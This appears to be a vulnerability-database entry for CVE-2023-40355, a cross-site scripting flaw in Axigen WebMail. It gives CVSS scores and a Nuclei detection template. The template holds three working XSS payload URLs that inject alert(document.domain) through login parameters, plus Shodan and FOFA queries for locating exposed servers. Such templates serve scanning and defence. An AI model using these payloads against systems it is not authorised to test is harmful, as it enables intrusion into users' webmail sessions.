CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence: High
EPSS Percentile: 78.2%
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
id: CVE-2023-40355

info:
  name: Axigen WebMail - Cross-Site Scripting
  author: amir-h-fallahi
  severity: medium
  description: |
    Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
  reference:
    - https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40355
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-40355
    cwe-id: CWE-79
    epss-score: 0.00587
    epss-percentile: 0.78117
    cpe: cpe:2.3:a:axigen:axigen_mobile_webmail:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: axigen
    product: axigen_mobile_webmail
    shodan-query: http.favicon.hash:-1247684400
    fofa-query: icon_hash=-1247684400
  tags: cve,cve2023,xss,axigen,webmail

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
      - "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
      - "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\\\\'-alert(document.domain),//"
          - "',alert(document.domain),'"
        condition: or

      - type: dsl
        dsl:
          - 'contains(header, "text/html")'
          - 'contains(response, "Axigen")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502201711e917883974fc1055e22022c081d81aefb637222322fc595cf91d992c05b8022100b25c9d8d083dc86f817080e290fe7dd21bbeec43c59b4fb98ba9724d52857b64:922c64590222798bb761d5b6d8e72950